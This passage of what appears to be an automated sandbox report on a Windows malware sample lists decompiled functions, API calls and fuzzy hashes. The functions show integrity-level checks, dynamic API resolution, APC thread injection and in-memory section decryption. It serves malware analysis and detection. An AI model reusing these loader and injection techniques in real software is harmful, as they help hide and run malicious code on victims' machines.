                        • Instruction Fuzzy Hash: 9821D276A01604FBD7219B64CC49F9E7BB9BF94740F248024FA05EB1E1E770A908DB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00501041(long* _a4) {
                        				long _v8;
                        				void* _v12;
                        				void _v16;
                        				long _v20;
                        				int _t33;
                        				void* _t46;
                        
                        				_v16 = 1;
                        				_v20 = 0x2000;
                        				if( *0x50a2b4 > 5) {
                        					_v16 = 0;
                        					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                        						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                        						_v8 = 0;
                        						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                        						if(_v8 != 0) {
                        							_t46 = E00505C4E(_v8);
                        							if(_t46 != 0) {
                        								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                        								if(_t33 != 0) {
                        									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                        								}
                        								E00502A03(_t46);
                        							}
                        						}
                        						CloseHandle(_v12);
                        					}
                        				}
                        				 *_a4 = _v20;
                        				return _v16;
                        			}

                        APIs
                        • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00501073
                        • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 00501093
                        • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 005010A3
                        • CloseHandle.KERNEL32(00000000), ref: 005010F3
                          • Part of subcall function 00505C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00503FAA), ref: 00505C5A
                        • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 005010C6
                        • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 005010CE
                        • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 005010DE
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File
                        Similarity
                        • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                        • String ID:
                        • API String ID: 1295030180-0
                        • Opcode ID: e98686d6f4c7cce64200baa3ba9affaa07488812c421f5f4d52273357bfa41d7
                        • Instruction ID: 6fb67f7aa804f1fa8a4e537b404206ae0de9ef4da7bfe4f48d0b4bd560294bfa
                        • Opcode Fuzzy Hash: e98686d6f4c7cce64200baa3ba9affaa07488812c421f5f4d52273357bfa41d7
                        • Instruction Fuzzy Hash: 0B214A7590024EFFEB109F90CC99EAEBFB9FB44304F0000A5E910A21A1DB714B44EB55
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 73%
                        			E00504430(signed int __edx, intOrPtr _a4) {
                        				struct _FILETIME _v12;
                        				char _v32;
                        				long _v40;
                        				void* _t14;
                        				void* _t16;
                        				int _t18;
                        				signed int _t20;
                        				void* _t22;
                        				signed int _t23;
                        				intOrPtr _t25;
                        				unsigned int _t29;
                        				signed int _t33;
                        				signed int _t40;
                        
                        				_t33 = __edx;
                        				_t14 = HeapCreate(0, 0x400000, 0); // executed
                        				 *0x50a290 = _t14;
                        				if(_t14 != 0) {
                        					 *0x50a180 = GetTickCount();
                        					_t16 = E00502A18(_a4);
                        					if(_t16 != 0) {
                        						L10:
                        						return _t16;
                        					} else {
                        						goto L3;
                        					}
                        					do {
                        						L3:
                        						GetSystemTimeAsFileTime( &_v12);
                        						_t18 = SwitchToThread();
                        						_t29 = _v12.dwHighDateTime;
                        						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
                        						_push(0);
                        						_push(9);
                        						_push(_t29 >> 7);
                        						_push(_t20);
                        						L005080B2();
                        						_t40 = _t18 + _t20;
                        						_t22 = E00503F5D(_a4, _t40);
                        						_t23 = 2;
                        						Sleep(_t23 << _t40); // executed
                        					} while (_t22 == 1);
                        					_t25 =  *0x50a2ac; // 0x2a8
                        					_v32 = 0;
                        					if(_t25 != 0) {
                        						__imp__(_t25,  &_v32);
                        						if(_t25 == 0) {
                        							_v40 = 0;
                        						}
                        						if(_v40 != 0) {
                        							 *0x50a2b8 = 1; // executed
                        						}
                        					}
                        					_t16 = E00502D63(_t33); // executed
                        					goto L10;
                        				}
                        				_t16 = 8;
                        				goto L10;
                        			}

                        APIs
                        • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00504445
                        • GetTickCount.KERNEL32 ref: 0050445C
                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 0050447C
                        • SwitchToThread.KERNEL32(?,00000001), ref: 00504482
                        • _aullrem.NTDLL(?,?,00000009,00000000), ref: 0050449E
                        • Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 005044B8
                        • IsWow64Process.KERNEL32(000002A8,?,?,00000001), ref: 005044D6
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
                        • String ID:
                        • API String ID: 3690864001-0
                        • Opcode ID: deb819e3dbd16ac076094f044a90757c722a31a66e4eb40de613537925a23792
                        • Instruction ID: 42e8237013aa13de774a60e35a075fe8f963267a115b70dd161c3f31d3bee1b6
                        • Opcode Fuzzy Hash: deb819e3dbd16ac076094f044a90757c722a31a66e4eb40de613537925a23792
                        • Instruction Fuzzy Hash: 3121A2F2A04305AFDB10AF64DC9DB2E7BE8BB54350F008929F655C2191D7749808DB62
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 64%
                        			E00505AE3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                        				intOrPtr _v8;
                        				intOrPtr _t9;
                        				intOrPtr _t13;
                        				char* _t19;
                        				char* _t28;
                        				void* _t33;
                        				void* _t34;
                        				char* _t36;
                        				void* _t38;
                        				intOrPtr* _t39;
                        				char* _t40;
                        				char* _t42;
                        				char* _t43;
                        
                        				_t34 = __edx;
                        				_push(__ecx);
                        				_t9 =  *0x50a2d0; // 0x2add5a8
                        				_t1 = _t9 + 0x50b61b; // 0x253d7325
                        				_t36 = 0;
                        				_t28 = E005047BA(__ecx, _t1);
                        				if(_t28 != 0) {
                        					_t39 = __imp__;
                        					_t13 =  *_t39(_t28, _t38);
                        					_v8 = _t13;
                        					_t6 =  *_t39(_a4) + 1; // 0x2fe9631
                        					_t40 = E00505C4E(_v8 + _t6);
                        					if(_t40 != 0) {
                        						strcpy(_t40, _t28);
                        						_pop(_t33);
                        						__imp__(_t40, _a4);
                        						_t19 = E00501AF1(_t33, _t34, _t40, _a8); // executed
                        						_t36 = _t19;
                        						E00502A03(_t40);
                        						_t42 = E0050332F(StrTrimA(_t36, "="), _t36);
                        						if(_t42 != 0) {
                        							E00502A03(_t36);
                        							_t36 = _t42;
                        						}
                        						_t43 = E00504138(_t36, _t33);
                        						if(_t43 != 0) {
                        							E00502A03(_t36);
                        							_t36 = _t43;
                        						}
                        					}
                        					E00502A03(_t28);
                        				}
                        				return _t36;
                        			}

                        APIs
                          • Part of subcall function 005047BA: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00505AFC,253D7325,00000000,00000000,?,00000000,00506301), ref: 00504821
                          • Part of subcall function 005047BA: sprintf.NTDLL ref: 00504842
                        • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00506301,00000000,02FE9630), ref: 00505B0E
                        • lstrlen.KERNEL32(00000000,?,00000000,00506301,00000000,02FE9630), ref: 00505B16
                          • Part of subcall function 00505C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00503FAA), ref: 00505C5A
                        • strcpy.NTDLL ref: 00505B2D
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00505B38
                          • Part of subcall function 00501AF1: lstrlen.KERNEL32(00000000,00000000,00506301,00000000,?,00505B47,00000000,00506301,?,00000000,00506301,00000000,02FE9630), ref: 00501B02
                          • Part of subcall function 00502A03: RtlFreeHeap.NTDLL(00000000,00000000,00504072,00000000,?,?,00000000,?,?,?,?,?,?,005044AE,00000000), ref: 00502A0F
                        • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00506301,?,00000000,00506301,00000000,02FE9630), ref: 00505B55
                          • Part of subcall function 0050332F: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,00505B61,00000000,?,00000000,00506301,00000000,02FE9630), ref: 00503339
                          • Part of subcall function 0050332F: _snprintf.NTDLL ref: 00503397
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                        • String ID: =
                        • API String ID: 2864389247-1428090586
                        • Opcode ID: 267abf0788035537d79f67ddf98abca827d0e325b81ee9f981615153d9a0935a
                        • Instruction ID: 355e7d0d0a385c1ac6ef142ba0a9a7cceea5ed911441bf28b3c2616182d8d544
                        • Opcode Fuzzy Hash: 267abf0788035537d79f67ddf98abca827d0e325b81ee9f981615153d9a0935a
                        • Instruction Fuzzy Hash: 4211C172A016266BCA2277649C89CAF3E9DBF857607090015F90197182DE64DD069BE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6C53E714
                          • Part of subcall function 6C5427F1: _setlocale.LIBCMT ref: 6C54280A
                        • _free.LIBCMT ref: 6C53E724
                          • Part of subcall function 6C543F97: HeapFree.KERNEL32(00000000,00000000,?,6C54C47F,00000000,00000001,00000000,?,00000000,?,6C54493E,6C5421A2,?), ref: 6C543FAB
                          • Part of subcall function 6C543F97: GetLastError.KERNEL32(00000000,?,6C54C47F,00000000,00000001,00000000,?,00000000,?,6C54493E,6C5421A2,?), ref: 6C543FBD
                        • _free.LIBCMT ref: 6C53E73B
                        • _free.LIBCMT ref: 6C53E752
                        • _free.LIBCMT ref: 6C53E769
                        • _free.LIBCMT ref: 6C53E780
                        • _free.LIBCMT ref: 6C53E797
                        Memory Dump Source
                        • Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                        • String ID:
                        • API String ID: 3515823920-0
                        • Opcode ID: 6f91f8754ef23c16e43dc6d4917a315c775c50e139badb3c96fa59e59bb81cd4
                        • Instruction ID: 87ed361d010c702af45d974c8f4297a791f0413c04180c94fd8c94ab921fac55
                        • Opcode Fuzzy Hash: 6f91f8754ef23c16e43dc6d4917a315c775c50e139badb3c96fa59e59bb81cd4
                        • Instruction Fuzzy Hash: 48011BF0A01B509BFA20CA359C4CB5777E85F10748F008928D85ACBB40F77AF90C8B96
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • SysAllocString.OLEAUT32(00000000), ref: 005016B2
                        • IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 00501734
                        • StrStrIW.SHLWAPI(00000000,006E0069), ref: 00501773
                        • SysFreeString.OLEAUT32(00000000), ref: 00501795
                          • Part of subcall function 005013B4: SysAllocString.OLEAUT32(005092D0), ref: 00501404
                        • SafeArrayDestroy.OLEAUT32(?), ref: 005017E9
                        • SysFreeString.OLEAUT32(?), ref: 005017F7
                          • Part of subcall function 00505872: Sleep.KERNELBASE(000001F4), ref: 005058BA
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                        • String ID:
                        • API String ID: 2118684380-0
                        • Opcode ID: 97fb278d744aeca64675b48333579722b56a4af4f9f3a2bda23b9ccc16005b93
                        • Instruction ID: dc30f8af439be345f2bf14c686d29ec7c576af1c0441263c47f8a62cc0bb56db
                        • Opcode Fuzzy Hash: 97fb278d744aeca64675b48333579722b56a4af4f9f3a2bda23b9ccc16005b93
                        • Instruction Fuzzy Hash: 6D51337690060EEFCB10DFE4C8888AEBBB6FF88350B148868E505EB264D7319D45CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E6C501AA5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                        				intOrPtr _v8;
                        				_Unknown_base(*)()* _t29;
                        				_Unknown_base(*)()* _t33;
                        				_Unknown_base(*)()* _t36;
                        				_Unknown_base(*)()* _t39;
                        				_Unknown_base(*)()* _t42;
                        				intOrPtr _t46;
                        				struct HINSTANCE__* _t50;
                        				intOrPtr _t56;
                        
                        				_t56 = E6C501C8F(0x20);
                        				if(_t56 == 0) {
                        					_v8 = 8;
                        				} else {
                        					_t50 = GetModuleHandleA( *0x6c5041d0 + 0x6c505014);
                        					_v8 = 0x7f;
                        					_t29 = GetProcAddress(_t50,  *0x6c5041d0 + 0x6c5050e1);
                        					 *(_t56 + 0xc) = _t29;
                        					if(_t29 == 0) {
                        						L8:
                        						E6C50136A(_t56);
                        					} else {
                        						_t33 = GetProcAddress(_t50,  *0x6c5041d0 + 0x6c5050f1);
                        						 *(_t56 + 0x10) = _t33;
                        						if(_t33 == 0) {
                        							goto L8;
                        						} else {
                        							_t36 = GetProcAddress(_t50,  *0x6c5041d0 + 0x6c505104);
                        							 *(_t56 + 0x14) = _t36;
                        							if(_t36 == 0) {
                        								goto L8;
                        							} else {
                        								_t39 = GetProcAddress(_t50,  *0x6c5041d0 + 0x6c505119);
                        								 *(_t56 + 0x18) = _t39;
                        								if(_t39 == 0) {
                        									goto L8;
                        								} else {
                        									_t42 = GetProcAddress(_t50,  *0x6c5041d0 + 0x6c50512f);
                        									 *(_t56 + 0x1c) = _t42;
                        									if(_t42 == 0) {
                        										goto L8;
                        									} else {
                        										 *((intOrPtr*)(_t56 + 8)) = _a8;
                        										 *((intOrPtr*)(_t56 + 4)) = _a4;
                        										_t46 = E6C5018D1(_t56, _a12); // executed
                        										_v8 = _t46;
                        										if(_t46 != 0) {
                        											goto L8;
                        										} else {
                        											 *_a16 = _t56;
                        										}
                        									}
                        								}
                        							}
                        						}
                        					}
                        				}
                        				return _v8;
                        			}












                        APIs
                          • Part of subcall function 6C501C8F: HeapAlloc.KERNEL32(00000000,?,6C50117D,?,00000000,00000000,?,?,?,6C501810), ref: 6C501C9B
                        • GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6C501272,?,?,?,?,00000002,00000000,?,?), ref: 6C501AC9
                        • GetProcAddress.KERNEL32(00000000,?), ref: 6C501AEB
                        • GetProcAddress.KERNEL32(00000000,?), ref: 6C501B01
                        • GetProcAddress.KERNEL32(00000000,?), ref: 6C501B17
                        • GetProcAddress.KERNEL32(00000000,?), ref: 6C501B2D
                        • GetProcAddress.KERNEL32(00000000,?), ref: 6C501B43
                          • Part of subcall function 6C5018D1: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,?), ref: 6C50192E
                          • Part of subcall function 6C5018D1: memset.NTDLL ref: 6C501950
                        Memory Dump Source
                        • Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true
                        • Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp
                        • Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp
                        Similarity
                        • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                        • String ID:
                        • API String ID: 1632424568-0
                        • Opcode ID: d265a4c39df785628a3a70925e1ae67521bacf67892b1b8e96dbd518112ff7f3
                        • Instruction ID: e0e4533f5eec5511279204b091700cc32c4e92be91ee0ffc42bd2aabfeee74bf
                        • Opcode Fuzzy Hash: d265a4c39df785628a3a70925e1ae67521bacf67892b1b8e96dbd518112ff7f3
                        • Instruction Fuzzy Hash: 11215CB1701A0ADFDB50EF69CD80E5B7BF8FB19288B01442AE805C7621E730E9158BA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 86%
                        			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                        				long _v8;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				char _t9;
                        				void* _t10;
                        				void* _t18;
                        				void* _t23;
                        				void* _t36;
                        
                        				_push(__ecx);
                        				_t9 = _a8;
                        				_v8 = 1;
                        				if(_t9 == 0) {
                        					_t10 = InterlockedDecrement(0x6c504188);
                        					__eflags = _t10;
                        					if(_t10 == 0) {
                        						__eflags =  *0x6c50418c;
                        						if( *0x6c50418c != 0) {
                        							_t36 = 0x2328;
                        							while(1) {
                        								SleepEx(0x64, 1);
                        								__eflags =  *0x6c504198;
                        								if( *0x6c504198 == 0) {
                        									break;
                        								}
                        								_t36 = _t36 - 0x64;
                        								__eflags = _t36;
                        								if(_t36 > 0) {
                        									continue;
                        								}
                        								break;
                        							}
                        							CloseHandle( *0x6c50418c);
                        						}
                        						HeapDestroy( *0x6c504190);
                        					}
                        				} else {
                        					if(_t9 == 1 && InterlockedIncrement(0x6c504188) == 1) {
                        						_t18 = HeapCreate(0, 0x400000, 0); // executed
                        						_t41 = _t18;
                        						 *0x6c504190 = _t18;
                        						if(_t18 == 0) {
                        							L6:
                        							_v8 = 0;
                        						} else {
                        							 *0x6c5041b0 = _a4;
                        							asm("lock xadd [eax], edi");
                        							_push( &_a8);
                        							_t23 = E6C501CA4(E6C501D32, E6C501EE0(_a12, 1, 0x6c504198, _t41));
                        							 *0x6c50418c = _t23;
                        							if(_t23 == 0) {
                        								asm("lock xadd [esi], eax");
                        								goto L6;
                        							}
                        						}
                        					}
                        				}
                        				return _v8;
                        			}












                        APIs
                        • InterlockedIncrement.KERNEL32(6C504188), ref: 6C501E26
                        • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6C501E3B
                          • Part of subcall function 6C501CA4: CreateThread.KERNELBASE(00000000,00000000,00000000,?,6C504198,6C501E74), ref: 6C501CBB
                          • Part of subcall function 6C501CA4: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6C501CD0
                          • Part of subcall function 6C501CA4: GetLastError.KERNEL32(00000000), ref: 6C501CDB
                          • Part of subcall function 6C501CA4: TerminateThread.KERNEL32(00000000,00000000), ref: 6C501CE5
                          • Part of subcall function 6C501CA4: CloseHandle.KERNEL32(00000000), ref: 6C501CEC
                          • Part of subcall function 6C501CA4: SetLastError.KERNEL32(00000000), ref: 6C501CF5
                        • InterlockedDecrement.KERNEL32(6C504188), ref: 6C501E8E
                        • SleepEx.KERNEL32(00000064,00000001), ref: 6C501EA8
                        • CloseHandle.KERNEL32 ref: 6C501EC4
                        • HeapDestroy.KERNEL32 ref: 6C501ED0
                        Memory Dump Source
                        • Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true
                        • Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp
                        • Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp
                        Similarity
                        • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                        • String ID:
                        • API String ID: 2110400756-0
                        • Opcode ID: c2c91a2ab509b55536cfabce61f616c569e42b98f9a7cfa4a4968ae061730c5d
                        • Instruction ID: 2858e4d4ba753e63581bf8f3f19757aca12cdbfb5f2c1b55975da0d35d1410ea
                        • Opcode Fuzzy Hash: c2c91a2ab509b55536cfabce61f616c569e42b98f9a7cfa4a4968ae061730c5d
                        • Instruction Fuzzy Hash: 24215C71B01605EBDB009FAACC84A5F7FB8FB6A3AC752452DE509D3A41E730CD049B66
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E6C501CA4(long _a4, DWORD* _a12) {
                        				_Unknown_base(*)()* _v0;
                        				void* _t4;
                        				long _t6;
                        				long _t11;
                        				void* _t13;
                        
                        				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6c5041cc, 0, _a12); // executed
                        				_t13 = _t4;
                        				if(_t13 != 0) {
                        					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                        					if(_t6 == 0) {
                        						_t11 = GetLastError();
                        						TerminateThread(_t13, _t11);
                        						CloseHandle(_t13);
                        						_t13 = 0;
                        						SetLastError(_t11);
                        					}
                        				}
                        				return _t13;
                        			}








                        APIs
                        • CreateThread.KERNELBASE(00000000,00000000,00000000,?,6C504198,6C501E74), ref: 6C501CBB
                        • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6C501CD0
                        • GetLastError.KERNEL32(00000000), ref: 6C501CDB
                        • TerminateThread.KERNEL32(00000000,00000000), ref: 6C501CE5
                        • CloseHandle.KERNEL32(00000000), ref: 6C501CEC
                        • SetLastError.KERNEL32(00000000), ref: 6C501CF5
                        Memory Dump Source
                        • Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true
                        • Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp
                        • Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp
                        Similarity
                        • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                        • String ID:
                        • API String ID: 3832013932-0
                        • Opcode ID: c63471c169195cbe0068b7032502df02cafd94048912852656ab6b7336d71a87
                        • Instruction ID: 42d17019c04e0185f78177e7fccff8a66305ccb83591c8355091107168e02717
                        • Opcode Fuzzy Hash: c63471c169195cbe0068b7032502df02cafd94048912852656ab6b7336d71a87
                        • Instruction Fuzzy Hash: 07F08C32306A21BBDB121BA08C1CF4BBF78FB0A715F02440CFA09D2140D721C8119BA9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • SysAllocString.OLEAUT32(80000002), ref: 005034A3
                        • SysAllocString.OLEAUT32(005020DE), ref: 005034E6
                        • SysFreeString.OLEAUT32(00000000), ref: 005034FA
                        • SysFreeString.OLEAUT32(00000000), ref: 00503508
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: String$AllocFree
                        • String ID:
                        • API String ID: 344208780-0
                        • Opcode ID: 3642ec43c406b3b746cb10f9fdbc1a403917b238fcc96d3863a27e8bc386ce01
                        • Instruction ID: 7b300bfd1a6c1785271ffa92b1aece364bcb34f3fd8170d3a2d40451acce4067
                        • Opcode Fuzzy Hash: 3642ec43c406b3b746cb10f9fdbc1a403917b238fcc96d3863a27e8bc386ce01
                        • Instruction Fuzzy Hash: 91313B7190010AEFCB05CF98D8C88AE7FB9FF58300B20846EF5069B260E7359A45CF61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 87%
                        			E6C5015A3(void* __edi, intOrPtr _a4) {
                        				intOrPtr _v8;
                        				unsigned int _v12;
                        				intOrPtr _v16;
                        				char _v20;
                        				void* _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				void* _v36;
                        				signed int _v44;
                        				signed int _v48;
                        				intOrPtr _t39;
                        				void* _t46;
                        				intOrPtr _t47;
                        				intOrPtr _t50;
                        				signed int _t59;
                        				signed int _t61;
                        				intOrPtr _t66;
                        				intOrPtr _t77;
                        				void* _t78;
                        				signed int _t80;
                        
                        				_t77 =  *0x6c5041b0;
                        				_t39 = E6C501A4B(_t77,  &_v20,  &_v12);
                        				_v16 = _t39;
                        				if(_t39 == 0) {
                        					asm("sbb ebx, ebx");
                        					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
                        					_t78 = _t77 + _v20;
                        					_v36 = _t78;
                        					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
                        					_v24 = _t46;
                        					if(_t46 == 0) {
                        						_v16 = 8;
                        					} else {
                        						_t61 = 0;
                        						if(_t59 <= 0) {
                        							_t47 =  *0x6c5041cc;
                        						} else {
                        							_t66 = _a4;
                        							_t50 = _t46 - _t78;
                        							_t11 = _t66 + 0x6c505137; // 0x6c505137
                        							_v28 = _t50;
                        							_v32 = _t50 + _t11;
                        							_v8 = _t78;
                        							while(1) {
                        								asm("movsd");
                        								asm("movsd");
                        								asm("movsd");
                        								_t19 = _t61 + 1; // 0x2
                        								_t80 = _t19;
                        								E6C501D02(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
                        								_t64 = _v32;
                        								_v8 = _v8 + 0x1000;
                        								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
                        								_t61 = _t80;
                        								 *0x6c5041cc = _t47;
                        								if(_t61 >= _t59) {
                        									break;
                        								}
                        								_t50 = _v28;
                        							}
                        						}
                        						if(_t47 != 0x63699bc3) {
                        							_v16 = 0xc;
                        						} else {
                        							memcpy(_v36, _v24, _v12);
                        						}
                        						VirtualFree(_v24, 0, 0x8000); // executed
                        					}
                        				}
                        				return _v16;
                        			}























                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6C5015F9
                        • memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6C5017EC), ref: 6C50168B
                        • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6C5016A6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true
                        • Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp
                        • Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp
                        Similarity
                        • API ID: Virtual$AllocFreememcpy
                        • String ID: Mar 26 2021
                        • API String ID: 4010158826-2175073649
                        • Opcode ID: 1fbbca5dd586482102da28e4a19539ef90f7fe4a778e20a74840a775ed99f38e
                        • Instruction ID: f08028e7eadcd4d423b96cc99367c03b922467bc2891bd9afdd4e058efd51776
                        • Opcode Fuzzy Hash: 1fbbca5dd586482102da28e4a19539ef90f7fe4a778e20a74840a775ed99f38e
                        • Instruction Fuzzy Hash: D6315E71F00609ABDF00CF99CD81ADEBBB9FF49308F148129E905EB641D771AA058F95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E00505988(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                        				intOrPtr _v8;
                        				void* _v12;
                        				void* _v16;
                        				intOrPtr _t26;
                        				intOrPtr* _t28;
                        				intOrPtr _t31;
                        				intOrPtr* _t32;
                        				void* _t39;
                        				int _t46;
                        				intOrPtr* _t47;
                        				int _t48;
                        
                        				_t47 = __eax;
                        				_push( &_v12);
                        				_push(__eax);
                        				_t39 = 0;
                        				_t46 = 0; // executed
                        				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                        				_v8 = _t26;
                        				if(_t26 < 0) {
                        					L13:
                        					return _v8;
                        				}
                        				if(_v12 == 0) {
                        					Sleep(0xc8);
                        					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                        				}
